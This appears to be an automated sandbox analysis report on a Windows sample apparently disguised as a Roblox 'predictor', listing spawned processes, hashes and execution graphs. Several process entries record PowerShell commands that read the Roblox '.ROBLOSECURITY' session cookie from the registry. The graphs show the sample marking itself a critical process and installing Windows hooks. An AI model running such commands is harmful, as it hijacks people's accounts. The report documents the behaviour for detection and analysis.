                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:93
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:94
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:95
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:96
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:97
                                                                                                                                                                                                                                Start time:05:21:41
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:98
                                                                                                                                                                                                                                Start time:05:21:43
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

Target ID: 99
Start time: 05:21:43
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 100
Start time: 05:21:43
Start date: 17/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 148
Start time: 05:21:57
Start date: 17/11/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0d6ca0dc9bb9bd7b1ab2d778467116272f375c185e74cb70c20774d2e7ab0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B40149B1A2EA994FE745BF3CE46526573D5FF89304B1001BAC849C7392EE2CEC418782
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e2f8ffea086f91ee10249c19f34b1cc996b57461f801dbbe1bdc6185ed874ad0
                                                                                                                                                                                                                                  • Instruction ID: f8e74df71e511f88664993ace71368703226c09943ad16d92e90e901c8a34931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2f8ffea086f91ee10249c19f34b1cc996b57461f801dbbe1bdc6185ed874ad0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0F4B062D5164BE755BE3CE4551B973D9EF89314B2001BAD84EC3282CE28EC424786
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1523476833.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4a120000_EternalPredictor.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 85b117b7f5eff043de388af495522db0f62f3d6c2834911b8993f453e7ac40f6
                                                                                                                                                                                                                                  • Instruction ID: 530392678e4e880f3cab013e5a75aebb00a84f4adfb2b632693b44383ec6501a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85b117b7f5eff043de388af495522db0f62f3d6c2834911b8993f453e7ac40f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0F4B072C9154BE654BE38E46426973D9FF8D304B500179D80EC3380DE2CEC424B82

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:24.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:6
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                  execution_graph 4345 7ffb4a132ff1 4346 7ffb4a132ff7 RtlSetProcessIsCritical 4345->4346 4348 7ffb4a1330d2 4346->4348 4349 7ffb4a132b62 4350 7ffb4a133230 SetWindowsHookExW 4349->4350 4352 7ffb4a1332e1 4350->4352

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: CAN_^
                                                                                                                                                                                                                                  • API String ID: 0-3098826533
                                                                                                                                                                                                                                  • Opcode ID: 670f34549caa67486924d89acff67afe75395a8cd0ae83b4aadeb72f074f9088
                                                                                                                                                                                                                                  • Instruction ID: 31422d7b30499139d98a305e76e9c9316d115dd956ac05693120c166dfec3366
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 670f34549caa67486924d89acff67afe75395a8cd0ae83b4aadeb72f074f9088
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4812D2A1A2DA064FF799FF3CC85937977D2EF99340F6405B9D44EC3292DE28A8414781

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 509 7ffb4a137ec6-7ffb4a137ed3 510 7ffb4a137ede-7ffb4a137f23 509->510 511 7ffb4a137ed5-7ffb4a137edd 509->511 513 7ffb4a137f24-7ffb4a137f3d 510->513 511->510 513->513 514 7ffb4a137f3f-7ffb4a137fa7 513->514 517 7ffb4a138013 514->517 518 7ffb4a137fa9-7ffb4a137fb2 514->518 520 7ffb4a138015-7ffb4a13803a 517->520 518->517 519 7ffb4a137fb4-7ffb4a137fc0 518->519 521 7ffb4a137fc2-7ffb4a137fd4 519->521 522 7ffb4a137ff9-7ffb4a138011 519->522 526 7ffb4a13803c-7ffb4a138045 520->526 527 7ffb4a1380a6 520->527 524 7ffb4a137fd6 521->524 525 7ffb4a137fd8-7ffb4a137feb 521->525 522->520 524->525 525->525 528 7ffb4a137fed-7ffb4a137ff5 525->528 526->527 529 7ffb4a138047-7ffb4a138053 526->529 530 7ffb4a1380a8-7ffb4a138150 527->530 528->522 531 7ffb4a13808c-7ffb4a1380a4 529->531 532 7ffb4a138055-7ffb4a138067 529->532 541 7ffb4a1381be 530->541 542 7ffb4a138152-7ffb4a13815c 530->542 531->530 533 7ffb4a13806b-7ffb4a13807e 532->533 534 7ffb4a138069 532->534 533->533 536 7ffb4a138080-7ffb4a138088 533->536 534->533 536->531 544 7ffb4a1381c0-7ffb4a1381e9 541->544 542->541 543 7ffb4a13815e-7ffb4a13816b 542->543 545 7ffb4a13816d-7ffb4a13817f 543->545 546 7ffb4a1381a4-7ffb4a1381bc 543->546 551 7ffb4a1381eb-7ffb4a1381f6 544->551 552 7ffb4a138253 544->552 547 7ffb4a138181 545->547 548 7ffb4a138183-7ffb4a138196 545->548 546->544 547->548 548->548 550 7ffb4a138198-7ffb4a1381a0 548->550 550->546 551->552 554 7ffb4a1381f8-7ffb4a138206 551->554 553 7ffb4a138255-7ffb4a1382e6 552->553 562 7ffb4a1382ec-7ffb4a1382fb 553->562 555 7ffb4a13823f-7ffb4a138251 554->555 556 7ffb4a138208-7ffb4a13821a 554->556 555->553 557 7ffb4a13821e-7ffb4a138231 556->557 558 7ffb4a13821c 556->558 557->557 560 7ffb4a138233-7ffb4a13823b 557->560 558->557 560->555 563 7ffb4a1382fd 562->563 564 
7ffb4a138303-7ffb4a138346 call 7ffb4a138384 562->564 563->564 571 7ffb4a138347-7ffb4a138360 564->571 571->571 572 7ffb4a138362-7ffb4a138368 571->572 573 7ffb4a13836f-7ffb4a138382 572->573 574 7ffb4a13836a 572->574 574->573
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 91dc1e85a2e84f30548ecee33a4ac6da926ec8f0e4f1dcba5e80bac1ab2a8361
                                                                                                                                                                                                                                  • Instruction ID: e595aef33695952622d979090147e60074310cb96c5470aff6cc4f38caea2c9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91dc1e85a2e84f30548ecee33a4ac6da926ec8f0e4f1dcba5e80bac1ab2a8361
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF1A47090CA8E8FEBA9EF28C8557E977E1FF55310F14426AE84DC7291CF3499458B82

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 575 7ffb4a139098-7ffb4a1390d3 579 7ffb4a1390d4-7ffb4a1390ed 575->579 579->579 580 7ffb4a1390ef-7ffb4a139157 579->580 583 7ffb4a1391c3 580->583 584 7ffb4a139159-7ffb4a139162 580->584 585 7ffb4a1391c5-7ffb4a1391ea 583->585 584->583 586 7ffb4a139164-7ffb4a139170 584->586 592 7ffb4a1391ec-7ffb4a1391f5 585->592 593 7ffb4a139256 585->593 587 7ffb4a139172-7ffb4a139184 586->587 588 7ffb4a1391a9-7ffb4a1391c1 586->588 590 7ffb4a139186 587->590 591 7ffb4a139188-7ffb4a13919b 587->591 588->585 590->591 591->591 594 7ffb4a13919d-7ffb4a1391a5 591->594 592->593 595 7ffb4a1391f7-7ffb4a139203 592->595 596 7ffb4a139258-7ffb4a13927d 593->596 594->588 597 7ffb4a13923c-7ffb4a139254 595->597 598 7ffb4a139205-7ffb4a139217 595->598 603 7ffb4a1392eb 596->603 604 7ffb4a13927f-7ffb4a139289 596->604 597->596 599 7ffb4a13921b-7ffb4a13922e 598->599 600 7ffb4a139219 598->600 599->599 602 7ffb4a139230-7ffb4a139238 599->602 600->599 602->597 605 7ffb4a1392ed-7ffb4a13931b 603->605 604->603 606 7ffb4a13928b-7ffb4a139298 604->606 613 7ffb4a13931d-7ffb4a139328 605->613 614 7ffb4a13938b 605->614 607 7ffb4a1392d1-7ffb4a1392e9 606->607 608 7ffb4a13929a-7ffb4a1392ac 606->608 607->605 609 7ffb4a1392ae 608->609 610 7ffb4a1392b0-7ffb4a1392c3 608->610 609->610 610->610 612 7ffb4a1392c5-7ffb4a1392cd 610->612 612->607 613->614 615 7ffb4a13932a-7ffb4a139338 613->615 616 7ffb4a13938d-7ffb4a13947a 614->616 617 7ffb4a139371-7ffb4a139389 615->617 618 7ffb4a13933a-7ffb4a13934c 615->618 627 7ffb4a13947c 616->627 628 7ffb4a139482-7ffb4a1394c2 call 7ffb4a139500 616->628 617->616 620 7ffb4a13934e 618->620 621 7ffb4a139350-7ffb4a139363 618->621 620->621 621->621 623 7ffb4a139365-7ffb4a13936d 621->623 623->617 627->628 635 7ffb4a1394c3-7ffb4a1394dc 628->635 635->635 636 
7ffb4a1394de-7ffb4a1394e4 635->636 637 7ffb4a1394eb-7ffb4a1394ff 636->637 638 7ffb4a1394e6 636->638 638->637
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 66fa6a9aa59e98bf610279081a408d17ec8e5b380ae88833fe5ecf0d81bd79b8
                                                                                                                                                                                                                                  • Instruction ID: e904ee9fa13c5736cebc5abf3b9863d26f54281d3b4c4e0f324a5b43c81fd90f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66fa6a9aa59e98bf610279081a408d17ec8e5b380ae88833fe5ecf0d81bd79b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6E1B27090CA4E8FFBA8EF28C8557E977E1FF55310F14826AE80DC7695DE34A9408B81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 606722e531f10fdd310cccd94438fdf5ef1217719f6da9a1c96fae09fba3e6a7
                                                                                                                                                                                                                                  • Instruction ID: aa7780af6ea10916b025d83e4fb8d9aed527c8ae363cfb0ca528dfbce784f72a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606722e531f10fdd310cccd94438fdf5ef1217719f6da9a1c96fae09fba3e6a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 145102A0A1E6C54FE796BF7C8869275BFD5DF97215B1800FAE08DC71A3ED18580AC342

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 132 7ffb4a132ff1-7ffb4a132ff5 133 7ffb4a132ffa-7ffb4a133009 132->133 134 7ffb4a132ff7-7ffb4a132ff8 132->134 135 7ffb4a13300b 133->135 136 7ffb4a13300c-7ffb4a1330d0 RtlSetProcessIsCritical 133->136 134->133 135->136 140 7ffb4a1330d2 136->140 141 7ffb4a1330d8-7ffb4a13310d 136->141 140->141
APIs
Memory Dump Source
• Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
• Opcode ID: 6cb1d8f23b00bac7ce6c7ff9d8aa07b57be4ed85f8be32dcb301ec75fb2eb5d7
• Instruction ID: f5d973a462f6a602d5ee03ed9266ea65616496c6a0ee976e49da5d7dc658bd9d
• Opcode Fuzzy Hash: 6cb1d8f23b00bac7ce6c7ff9d8aa07b57be4ed85f8be32dcb301ec75fb2eb5d7
• Instruction Fuzzy Hash: 3F41337180C6498FEB19EF6CD849AF97BF0EF56321F14016FE08AC3582CB246846CB91

Control-flow Graph (rendered graph not extracted; the function calls SetWindowsHookExW)
APIs
Memory Dump Source
• Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 8e32cf153686a4bf5303edc510d84ecdbaeae5bd4222bc5c6c733c40289cfbc6
• Instruction ID: 471c3cfb24f52ed2fd49cc86167c6399c1edd94a21b8841ce9dba7e856bf98a6
• Opcode Fuzzy Hash: 8e32cf153686a4bf5303edc510d84ecdbaeae5bd4222bc5c6c733c40289cfbc6
• Instruction Fuzzy Hash: CB312B7190CA4D4FDB18EF6CD8466F9BBE1EF55321F10427ED009C3192CE64A812CB81

Control-flow Graph (rendered graph not extracted; the function calls SetWindowsHookExW)
APIs
Memory Dump Source
• Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 15292747addaf39e739917e3ca3a1b3591ac89d191da05f776c5439ce5feb34d
• Instruction ID: 0e71faef3c9cb81b8ae004bc3a77573547f9f3698b97590fb316061884cf7b29
• Opcode Fuzzy Hash: 15292747addaf39e739917e3ca3a1b3591ac89d191da05f776c5439ce5feb34d
• Instruction Fuzzy Hash: 8931E671A1CA1D8FEB58EF6CD8066F977E5EB59321F10413ED04ED3251CE60A8128BC5
Memory Dump Source
• Source File: 00000002.00000002.3242525370.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffb4a130000_eternal.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a72ae67ad1b043c91e401570ecffe9ca2d6c8fbd00c2a182062d69933961571a
• Instruction ID: ebdda85eb13cd870af3f56c6609309d5fb1959d182a7a85bf264e34c9d59d253
• Opcode Fuzzy Hash: a72ae67ad1b043c91e401570ecffe9ca2d6c8fbd00c2a182062d69933961571a
• Instruction Fuzzy Hash: 1ED1D77190C74D4FEB19EFA8D8456E9BBE1EF96321F1442AFD049C3292CE746805CB91
Memory Dump Source
• Source File: 00000003.00000002.1548914737.0000000000CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_cf0000_skuld.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
• Instruction ID: 9884ae7dd942394ac47826abdbbefc86d9c42104ba989b633c82d0f355911fc7
• Opcode Fuzzy Hash: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
• Instruction Fuzzy Hash: 5F31982791CFC482D3218B24F5413AAB364F7A9784F15A315EFC812A1ADF38E2E5CB50
Memory Dump Source
• Source File: 00000003.00000002.1548914737.0000000000CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550687873.000000000168F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016AB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550725759.00000000016F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550944413.00000000016FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1550984975.0000000001718000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1551009951.0000000001719000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_cf0000_skuld.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
                                                                                                                                                                                                                                  • Instruction ID: 80019dc4ddb0fe301f424796f8e716d0101d7a9678c4ba98569a6b04074d1549
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:8.6%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:1.1%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:29
execution_graph: flattened node/edge list of the rendered graph (2000 nodes, 29 limit nodes); the raw token stream is not reproduced here, only what can be recovered from it.
• Format of the list: each node is a numeric node ID, the address of the block (all in the 7ff72c65xxxx to 7ff72c67xxxx range), the Win32 or CRT symbols referenced in that block, and an optional "N API calls" roll-up for the callees below it; edges are written as src->dst.
• Win32 APIs on graph nodes, process startup and runtime housekeeping: IsProcessorFeaturePresent, GetStartupInfoW, InitializeSListHead, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, FlsGetValue, FlsSetValue, TlsFree, HeapAlloc, RtlFreeHeap, GetLastError, SetLastError
• Win32 APIs on graph nodes, fatal-error path: RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
• Win32 APIs on graph nodes, own image path, environment and file system: GetModuleFileNameW, FindFirstFileExW, FindClose, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, GetCurrentProcessId
• Win32 APIs on graph nodes, library loading: SetDllDirectoryW, LoadLibraryExW
• Win32 APIs on graph nodes, token handling and string conversion: OpenProcessToken, LocalFree, MultiByteToWideChar, WideCharToMultiByte
• Win32 APIs on graph nodes, error reporting and message loop: FormatMessageW, MessageBoxW, PostMessageW, GetMessageW
• CRT-internal symbols on graph nodes: _isindst, memcpy_s, _log10_special, _invalid_parameter_noinfo, __free_lconv_mon, _RTC_Initialize, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_dllmain_crt_thread_attach, _CreateFrameInfo, __vcrt_freefls, __vcrt_FlsAlloc, _fread_nolock
• Reading note: IsDebuggerPresent appears only in blocks that also call SetUnhandledExceptionFilter and UnhandledExceptionFilter directly after RtlCaptureContext/RtlVirtualUnwind and lead on to GetCurrentProcess/TerminateProcess, which is the shape of a CRT fatal-error handler rather than a standalone anti-debugging check; the graph alone does not establish intent either way.
